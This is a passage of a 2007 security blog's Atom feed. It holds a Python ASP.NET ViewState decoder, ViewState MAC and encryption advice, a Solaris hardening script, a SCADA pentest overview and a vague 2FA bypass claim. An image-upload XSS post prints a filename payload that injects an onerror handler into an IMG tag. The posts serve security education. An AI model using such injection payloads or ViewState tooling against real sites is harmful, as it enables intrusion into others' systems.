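        b = buf[pos]
        pos += 1
        value += (b % 128) * mult
        if b >= 0x80:              # high bit set: another byte follows
            mult *= 128
            continue
        return value, pos


def _write_7bit(n):
    out = bytearray()
    while n >= 0x80:
        out.append((n % 128) + 0x80)
        n //= 128
    out.append(n)
    return bytes(out)


def _read_obj(buf, pos, table):
    """Parse one serialized value at pos; table is this blob's IndexedString table."""
    tok = buf[pos]
    pos += 1
    simple = {T_NULL: None, T_TRUE: True, T_FALSE: False, T_ZEROINT32: 0, T_EMPTYSTRING: ""}
    if tok in simple:
        return simple[tok], pos
    if tok == T_INT16:
        return int.from_bytes(buf[pos:pos + 2], "little", signed=True), pos + 2
    if tok == T_INT32:
        return _read_7bit(buf, pos)
    if tok in (T_STRING, T_ISTRING_ADD):
        n, pos = _read_7bit(buf, pos)
        s = buf[pos:pos + n].decode("utf-8")
        if tok == T_ISTRING_ADD:
            table.append(s)
        return s, pos + n
    if tok == T_ISTRING:
        idx, pos = _read_7bit(buf, pos)
        return table[idx], pos
    if tok in (T_PAIR, T_TRIPLET, T_ARRAYLIST):
        if tok == T_ARRAYLIST:
            count, pos = _read_7bit(buf, pos)
        else:
            count = 2 if tok == T_PAIR else 3
        items = []
        for _ in range(count):
            item, pos = _read_obj(buf, pos, table)
            items.append(item)
        return (items if tok == T_ARRAYLIST else tuple(items)), pos
    raise ValueError(f"unsupported token 0x{tok:02x} at offset {pos - 1}")


def _write_obj(v):
    """Inverse of _read_obj for the same token subset (strings always as plain T_STRING)."""
    if v is None:
        return bytes([T_NULL])
    if v is True or v is False:
        return bytes([T_TRUE if v else T_FALSE])
    if isinstance(v, int):
        return bytes([T_ZEROINT32]) if v == 0 else bytes([T_INT32]) + _write_7bit(v)
    if isinstance(v, str):
        data = v.encode("utf-8")
        return bytes([T_EMPTYSTRING]) if not data else bytes([T_STRING]) + _write_7bit(len(data)) + data
    if isinstance(v, tuple):
        return bytes([T_PAIR if len(v) == 2 else T_TRIPLET]) + b"".join(_write_obj(x) for x in v)
    if isinstance(v, list):
        return bytes([T_ARRAYLIST]) + _write_7bit(len(v)) + b"".join(_write_obj(x) for x in v)
    raise TypeError(f"cannot serialize {type(v).__name__}")


def decode_raw(raw):
    """Parse a base64-decoded __VIEWSTATE blob. Returns the state graph, the number of
    bytes left after it (a MAC, when present, is simply appended) and the MAC algorithm
    that trailer length suggests. A MAC'd field still parses: the MAC blocks tampering,
    not reading. An encrypted field has no ff 01 header at all and is rejected here."""
    if not raw.startswith(MAGIC):
        raise ValueError("no ff 01 header: encrypted, or not an ObjectStateFormatter blob")
    state, end = _read_obj(raw, len(MAGIC), [])
    trailer = len(raw) - end
    return {"state": state, "trailer_bytes": trailer, "mac_guess": MAC_LENGTHS.get(trailer)}


def decode_viewstate(b64):
    """Decode the base64 value of the __VIEWSTATE hidden field."""
    return decode_raw(base64.b64decode(b64))


def build_viewstate(state, mac=b""):
    """Serialize a Python value with the same tokens, to construct test vectors; mac is a
    stand-in trailer for the server's HMAC (a real one is keyed with the machineKey)."""
    return base64.b64encode(MAGIC + _write_obj(state) + mac).decode()


if __name__ == "__main__":
    # Constructed page state, shaped like a typical ASP.NET 2.0 ViewState graph.
    demo = ((1234567890, ["txtUser", "alice", "IsAdmin", False]), None)
    print(decode_viewstate(build_viewstate(demo)))
    print(decode_viewstate(build_viewstate(demo, mac=bytes(20)))["mac_guess"])
```

Running it prints the decoded graph for a plain field, then the MAC guess for the same field with a 20-byte trailer appended. The trailer-length check is a heuristic, not a verification: without the machineKey you cannot validate the MAC, only notice that one is there, and a field that carries one still reads in the clear. If the value does not begin with the ff 01 marker it is either encrypted or not ViewState at all, and the parser refuses it rather than guess.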
&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp2.blogger.com/_Zx8XWzC_KPQ/R1KVNVwdbuI/AAAAAAAAAf4/ljyOi2mer4U/s1600-R/viewstate2.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_Zx8XWzC_KPQ/R1KVNVwdbuI/AAAAAAAAAf4/0NRjgYjSpLc/s400/viewstate2.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5139334181194395362" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The latest version of burp proxy allows you to decode ViewState's base64 algorithm and view the clear contents inside, or you can also download ViewState decoder from Fritz Onion to ONLY view the contents inside. Check out the both links below:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.dotnetspider.com/tools/ShowTool.aspx?ToolId=378"&gt;http://www.dotnetspider.com/tools/ShowTool.aspx?ToolId=378&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.portswigger.net/2007/06/viewstate-snooping.html"&gt;http://blog.portswigger.net/2007/06/viewstate-snooping.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Because the customer is using some sort of VPN, i was unable to use PortSwigger's burp proxy for what ever reason. However, i managed to decode the ViewState using Viewstate Decoder. &lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp3.blogger.com/_Zx8XWzC_KPQ/R1KP2lwdbtI/AAAAAAAAAfw/mPysGUuKKko/s1600-R/viewstate.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_Zx8XWzC_KPQ/R1KP2lwdbtI/AAAAAAAAAfw/ryIjTWbOxIQ/s400/viewstate.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5139328292794232530" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;To prevent attackers from manipulating View State, you can include a message authentication code (MAC). A MAC is essentially a hash of the data that ensures its integrity. You can enable the View State MAC on the machine, application, or page level. 
You can enable the MAC wherever you enable View State with this attribute:&lt;br /&gt;enableViewStateMac="true"&lt;br /&gt;&lt;br /&gt;To truly secure ViewState, you will also need to encrypt the data with the ViewStateEncryptionMode property set to true. The MAC only detects tampering; encryption is what prevents attackers from decoding and viewing the data inside ViewState. To read more about ViewState security, check out the MSDN links below:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://msdn2.microsoft.com/en-us/library/ms178199.aspx"&gt;http://msdn2.microsoft.com/en-us/library/ms178199.aspx&lt;/a&gt;&lt;br /&gt;&lt;a href="http://msdn.microsoft.com/msdnmag/issues/03/02/CuttingEdge/"&gt;http://msdn.microsoft.com/msdnmag/issues/03/02/CuttingEdge/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-929751356444362472?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/929751356444362472/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=929751356444362472' title='191 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/929751356444362472'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/929751356444362472'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/12/net-viewstate-vulnerable-manipulation.html' title='.NET ViewState vulnerable to manipulation exploits'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail 
xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_Zx8XWzC_KPQ/R1KVNVwdbuI/AAAAAAAAAf4/0NRjgYjSpLc/s72-c/viewstate2.JPG' height='72' width='72'/><thr:total>191</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-5947613246797400224</id><published>2007-11-25T19:31:00.000+08:00</published><updated>2007-11-25T20:03:06.816+08:00</updated><title type='text'>Old School Oracle Auditing</title><content type='html'>I was again reading hacking articles and one of the articles, "Simple Oracle Auditing", caught my attention. Well, it's an old article but it's still fun to read and learn from the gurus. Check it out guys: &lt;a href="http://www.securityfocus.com/infocus/1689"&gt;http://www.securityfocus.com/infocus/1689&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-5947613246797400224?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/5947613246797400224/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=5947613246797400224' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5947613246797400224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5947613246797400224'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/old-school-oracle-auditing.html' title='Old School Oracle Auditing'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1163400877522539081</id><published>2007-11-22T07:59:00.000+08:00</published><updated>2007-11-22T08:20:42.546+08:00</updated><title type='text'>7 steps to better Solaris Network Settings</title><content type='html'>I was auditing one of our customers again and this time round, I managed to come up with a 7-step guide to better secure the TCP stack on Solaris. Well, you guys can add on for more.&lt;br /&gt;&lt;br /&gt;1. Configure more random TCP initial sequence number generation. Check that in /etc/default/inetinit, TCP_STRONG_ISS is set to 2. For instance: TCP_STRONG_ISS=2&lt;br /&gt;&lt;br /&gt;2. IP forwarding is to be turned off to prevent the machine acting as a router. To disable IP forwarding, the file "/etc/notrouter" needs to be present. If the file is missing, issue the following command to create one: touch /etc/notrouter&lt;br /&gt;&lt;br /&gt;To prevent dynamic route updates via the network, move "in.routed" and "in.rdisc" out of the "/usr/sbin" directory by performing the following commands:&lt;br /&gt;mv /usr/sbin/in.routed /export/home/cfgh/base&lt;br /&gt;mv /usr/sbin/in.rdisc /export/home/cfgh/base&lt;br /&gt;&lt;br /&gt;3. Change the default kernel IP settings for better security. 
Follow these steps to change the kernel IP default values:&lt;br /&gt;&lt;br /&gt;Set up the files and environment:&lt;br /&gt;touch /etc/init.d/exconfig&lt;br /&gt;ln -s /etc/init.d/exconfig /etc/rc2.d/S70exconfig&lt;br /&gt;chmod 744 /etc/init.d/exconfig /etc/rc2.d/S70exconfig&lt;br /&gt;&lt;br /&gt;Edit the file "/etc/init.d/exconfig" and add the following lines:&lt;br /&gt;#!/bin/sh&lt;br /&gt;# /etc/init.d/exconfig&lt;br /&gt;# Apply kernel IP/TCP hardening according to the Solaris release&lt;br /&gt;RELEASE=`/usr/bin/uname -r`&lt;br /&gt;release7 ()&lt;br /&gt;{&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_forwarding 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_strict_dst_multihoming 1&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_send_redirects 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_ignore_redirect 1&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_forward_src_routed 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_forward_directed_broadcasts 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_respond_to_echo_broadcast 0&lt;br /&gt;/usr/sbin/ex -set /dev/tcp tcp_conn_req_max_q0 4096&lt;br /&gt;/usr/sbin/ex -set /dev/tcp tcp_ip_abort_cinterval 60000&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_respond_to_timestamp 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_respond_to_timestamp_broadcast 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_respond_to_address_mask_broadcast 0&lt;br /&gt;/usr/sbin/ex -set /dev/arp arp_cleanup_interval 60000&lt;br /&gt;# Only raise the keepalive interval when the mqm account (e.g. for MQ) exists&lt;br /&gt;id -a mqm &gt; /dev/null 2&gt;&amp;1&lt;br /&gt;if [ $? -eq 0 ]&lt;br /&gt;then&lt;br /&gt;/usr/sbin/ex -set /dev/tcp tcp_keepalive_interval 600000&lt;br /&gt;fi&lt;br /&gt;}&lt;br /&gt;release8 ()&lt;br /&gt;{&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip6_forwarding 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip6_strict_dst_multihoming 1&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip6_send_redirects 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip6_ignore_redirect 1&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip6_forward_src_routed 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_ire_arp_interval 60000&lt;br /&gt;}&lt;br /&gt;release6 ()&lt;br /&gt;{&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_respond_to_echo_broadcast 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_forward_directed_broadcasts 0&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_strict_dst_multihoming 1&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_ignore_redirect 1&lt;br /&gt;/usr/sbin/ex -set /dev/ip ip_forward_src_routed 0&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;if [ "$RELEASE" = "5.7" ]&lt;br /&gt;then&lt;br /&gt;        release7&lt;br /&gt;elif [ "$RELEASE" = "5.8" ] || [ "$RELEASE" = "5.10" ] || [ "$RELEASE" = "5.9" ]&lt;br /&gt;then&lt;br /&gt;        release7&lt;br /&gt;        release8&lt;br /&gt;elif [ "$RELEASE" = "5.6" ]&lt;br /&gt;then&lt;br /&gt;        release6&lt;br /&gt;fi&lt;br /&gt;&lt;br /&gt;4. Disable multicast on the server: edit the file "/etc/rc2.d/S72inetsvc" and comment out or remove the following lines:&lt;br /&gt;#(&lt;br /&gt;#if [ "$_INIT_NET_STRATEGY" = "dhcp" ]; then&lt;br /&gt;#   mcastif=`/sbin/dhcpinfo Yiaddr` || mcastif=$_INIT_UTS_NODENAME&lt;br /&gt;#else&lt;br /&gt;#   mcastif=$_INIT_UTS_NODENAME&lt;br /&gt;#fi&lt;br /&gt;#&lt;br /&gt;#echo "Setting default IPv4 interface for multicast:" \&lt;br /&gt;#  "add net 224.0/4: gateway $mcastif"&lt;br /&gt;#&lt;br /&gt;#/usr/sbin/route -n add -interface "224.0/4" "$mcastif"  &gt;/dev/null&lt;br /&gt;#)&amp;&lt;br /&gt;&lt;br /&gt;For Solaris 10&lt;br /&gt;Multicast is disabled using /etc/rc2.d/S72inetsvc-os10 (see step 6).&lt;br /&gt;&lt;br /&gt;5. 
Denial of Service Prevention System Settings.&lt;br /&gt;Unless required by a business function, the following services must be disabled on all servers (remove them from /etc/services): ftp-data ftp tftp pop2 pop3 pop-2 nntp chargen daytime discard echo finger talk who whois new-rwho klogin eklogin telnet systat netstat time&lt;br /&gt;&lt;br /&gt;6. Prevent core dumps generated by inetd, as they may contain login information. This can be achieved by editing the file "/etc/rc2.d/S72inetsvc". Change the line:&lt;br /&gt;/usr/sbin/inetd -s &amp;&lt;br /&gt;to&lt;br /&gt;/usr/bin/ulimit -c 0; /usr/sbin/inetd -s -t &amp;&lt;br /&gt;Note:&lt;br /&gt;ulimit -c 0 : sets the core file size limit to 0 bytes&lt;br /&gt;inetd -s -t : stand-alone server with tracing of all TCP connections&lt;br /&gt;&lt;br /&gt;For Solaris 10&lt;br /&gt;Create the script /etc/rc2.d/S72inetsvc-os10 as shown below. &lt;br /&gt;#cat /etc/rc2.d/S72inetsvc-os10&lt;br /&gt;# Remove the default multicast route, then enable inetd with TCP tracing&lt;br /&gt;IPADDR=`netstat -nr | grep -w 224.0.0.0 | awk '{print $2}'`&lt;br /&gt;/usr/sbin/route -n delete -interface "224.0/4" $IPADDR&lt;br /&gt;/usr/sbin/svcadm enable inetd&lt;br /&gt;/usr/sbin/inetadm -M tcp_trace=TRUE&lt;br /&gt;#chmod 555 /etc/rc2.d/S72inetsvc-os10&lt;br /&gt;&lt;br /&gt;7. .netrc files System Settings (.netrc files, including .netrc files in root's home directory). 
.netrc files are not permitted; remove any that exist. To locate them, issue the command: find / -name .netrc -print&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1163400877522539081?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1163400877522539081/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1163400877522539081' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1163400877522539081'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1163400877522539081'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/7-steps-to-better-solaris-network.html' title='7 steps to better Solaris Network Settings'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-7705613907536080571</id><published>2007-11-21T08:49:00.000+08:00</published><updated>2007-11-21T08:56:18.854+08:00</updated><title type='text'>Hacking Iphone the fun way</title><content type='html'>I got my iPhone and I know there are exploits and vulnerabilities in it discovered by H.D. Moore, creator of Metasploit. However I wasn't too enthusiastic about the damage that this exploit can do but more into the fun aspect of how to install new 3rd party applications on the phone. I know that you can install hacking tools too, but that's not my goal. 
Why install those tools when you can install them on the PC? Anyway, I managed to unlock the phone with a little help and of course start using it. It is the coolest phone out on the planet and of course with the video below, I managed to install more applications on my phone. Check it out.&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ZgITSfrEILQ&amp;rel=1"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ZgITSfrEILQ&amp;rel=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-7705613907536080571?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/7705613907536080571/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=7705613907536080571' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7705613907536080571'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/7705613907536080571'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/hacking-iphone-fun-way.html' title='Hacking Iphone the fun way'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2183111735016863153</id><published>2007-11-20T09:44:00.000+08:00</published><updated>2007-11-20T10:48:52.993+08:00</updated><title type='text'>Hacking SCADA</title><content type='html'>While I was in Dubai, I got a chance to visit one of our customers who was using SCADA. Back then, it was so new to me and I had no idea of how to actually audit it. Back here in Singapore, I got another chance to actually test and audit SCADA systems and this time round, I found a way to actually break the application and network apart. However, I had to be very careful during the audit, as one wrong move may affect the whole of Singapore.&lt;br /&gt;&lt;br /&gt;So what is SCADA? SCADA stands for Supervisory Control and Data Acquisition and these are the systems that deliver water, power supply, gas and some other items to your home. Check out &lt;a href="http://en.wikipedia.org/wiki/SCADA"&gt;http://en.wikipedia.org/wiki/SCADA&lt;/a&gt; if you would love to read more about it. There have been incidents where SCADA systems were hacked and information was stolen by terrorists. Also, internet worms like the Slammer worm also affected these systems and caused a total DoS. Why is all this happening? All I can say is either because those systems are exposed to the internet or they are using proprietary protocols and they think that they are safe from hackers and don't care about it. Those people working in SCADA are so wrong; they don't bother about security at all, and I guess it's because something disturbing might have happened and only then do they start to panic and need people like us to audit their systems.&lt;br /&gt;&lt;br /&gt;SCADA uses its own proprietary protocols like DNP3, OPC, Modbus, DCS, etc., and it's possible to use Wireshark to actually monitor the traffic and see how the handshaking process works. 
By observing the handshake, I realised that it was possible to perform man in the middle attacks, but of course it would require developing some tools to perform the job. Some other attacks that are possible include DoS, capturing of username and password, injecting worms and viruses and many other old school techniques.&lt;br /&gt;&lt;br /&gt;The problems with SCADA:&lt;br /&gt;1. Windows &amp; Linux Vulnerabilities&lt;br /&gt;2. Not patched regularly – maximum uptime needed&lt;br /&gt;3. Denial of Service Attack&lt;br /&gt;4. Continuous string of reboot commands&lt;br /&gt;5. No Authentication&lt;br /&gt;6. No Accounting&lt;br /&gt;7. Traffic sent in clear text (username &amp; password)&lt;br /&gt;8. No encryption&lt;br /&gt;&lt;br /&gt;To pentest SCADA systems, you can do the following:&lt;br /&gt;1. Port Scanning&lt;br /&gt;2. OS Fingerprinting&lt;br /&gt;3. Vulnerability Scanning&lt;br /&gt;4. Exploitation&lt;br /&gt;5. Credentials Guessing&lt;br /&gt;6. Sniffing&lt;br /&gt;7. Fuzzing&lt;br /&gt;&lt;br /&gt;Of course there are many other possibilities for pentesting SCADA systems. I for sure want another session with SCADA because it is so fun having to touch on mission critical systems that can affect the whole country. There are tons and tons of possibilities and problems with SCADA and I have just outlined a few obvious ones. 
Of course, you've got to be in the SCADA environment if you actually want to discover more possibilities, but then again, do we have such chances every day?&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2183111735016863153?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/2183111735016863153/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=2183111735016863153' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2183111735016863153'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/2183111735016863153'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/hacking-scada.html' title='Hacking SCADA'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-1663451231563456943</id><published>2007-11-19T09:24:00.000+08:00</published><updated>2007-11-19T09:51:56.624+08:00</updated><title type='text'>Two factor authentication bypassed</title><content type='html'>It has been a long fortnight and I have not finished writing my reports for various banks. There really were that many reports to write, especially for one particular bank. 
I managed to bypass the security control mechanism set up by this bank and steal the username and password of any user.&lt;br /&gt;&lt;br /&gt;Most of the banks here in Singapore practise two-factor authentication and most people think that it is secure because of the extra added security. However, a PoC was released to the bank showing them that it was possible to bypass the security control mechanism and capture the username and password of any user. I am sorry guys, I am not supposed to leak out any information here. It is very sensitive from the bank's point of view. The best part of the exploit was that there was no XSS or SQL injection or any sort of vulnerability that facilitated this exploit. It was purely just information gathered during the passive information gathering exercise.&lt;br /&gt;&lt;br /&gt;I was browsing their site and I discovered a section where some information could help me facilitate the research of writing the exploit. I had an albeit pedantic thought when I saw that particular section. I was thinking that with all that information, I am definitely able to bypass the security mechanism. However to do that, I would require someone else to write the code for me with my ideas. Nevertheless, within a week, I managed to come out with a PoC and display a great deal of demonstration. Guys, I know you want to know the details, but I simply can't reveal anything because of the Non Disclosure Agreement I signed. All I can say is passive information gathering is a very important exercise when trying to attack a huge organization; guys can spend hours and days writing a cool exploit, while with me, all I need is total observation and I got the results I want with ease. Why bother going all the way to do something difficult when something easy can be accomplished faster?&lt;br /&gt;&lt;br /&gt;I would love to attach a screenshot of what I managed to capture, but then again, it is too sensitive. 
I am sorry, but just know that it is possible to bypass 2FA.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-1663451231563456943?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/1663451231563456943/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=1663451231563456943' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1663451231563456943'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/1663451231563456943'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/two-factor-authentication-bypassed.html' title='Two factor authentication bypassed'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-8964266155755870995</id><published>2007-11-17T21:34:00.000+08:00</published><updated>2007-11-21T08:40:08.803+08:00</updated><title type='text'>Image upload xss</title><content type='html'>Also, I stumbled across an old blog post by rsnake where it was possible to execute XSS through an upload function.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://ha.ckers.org/blog/20070603/image-upload-xss/"&gt;http://ha.ckers.org/blog/20070603/image-upload-xss/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a 
href="http://pstgroup.blogspot.com/2007/06/tipsimage-upload-xss.html"&gt;http://pstgroup.blogspot.com/2007/06/tipsimage-upload-xss.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;An example of something you might test for: a page that embeds the uploaded file name unescaped in an image tag, such as&lt;br /&gt;&lt;br /&gt;&lt;IMG SRC="$filename"&gt;&lt;br /&gt;&lt;br /&gt;So you upload this file:&lt;br /&gt;&lt;br /&gt;http://ha.ckers.org/image-xss/"onerror="alert('XSS')"a=".jpg&lt;br /&gt;&lt;br /&gt;This ends up making the page look like:&lt;br /&gt;&lt;br /&gt;&lt;IMG SRC=""onerror="alert('XSS')"a=".jpg"&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-8964266155755870995?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/8964266155755870995/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=8964266155755870995' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8964266155755870995'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/8964266155755870995'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/image-upload-xss.html' title='Image upload xss'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-9180123455453391155</id><published>2007-11-17T21:23:00.000+08:00</published><updated>2007-11-17T21:32:54.835+08:00</updated><title type='text'>DOM Based XSS</title><content 
type='html'>I was reading Amit Klein's 2005 article on DOM Based XSS and he actually mentioned a few things to look out for in DOM XSS. In that article, he gave us an inside look at how to look for potential XSS in the DOM and why sanitizing is important on the client side. &lt;br /&gt;&lt;br /&gt;The full article is here: &lt;a href="http://www.webappsec.org/projects/articles/071105.html"&gt;http://www.webappsec.org/projects/articles/071105.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Below is a snippet:&lt;br /&gt;&lt;br /&gt;2. Analyzing and hardening the client side (Javascript) code. Reference to DOM objects that may be influenced by the user (attacker) should be inspected, including (but not limited to):&lt;br /&gt;&lt;br /&gt;document.URL&lt;br /&gt;document.URLUnencoded&lt;br /&gt;document.location (and many of its properties)&lt;br /&gt;document.referrer&lt;br /&gt;window.location (and many of its properties)&lt;br /&gt;Note that a document object property or a window object property may be referenced syntactically in many ways - explicitly (e.g. window.location), implicitly (e.g. location), or via obtaining a handle to a window and using it (e.g. handle_to_some_window.location).&lt;br /&gt;&lt;br /&gt;Special attention should be given to scenarios wherein the DOM is modified, either explicitly or potentially, either via raw access to the HTML or via access to the DOM itself, e.g. (by no means an exhaustive list, there are probably various browser extensions):&lt;br 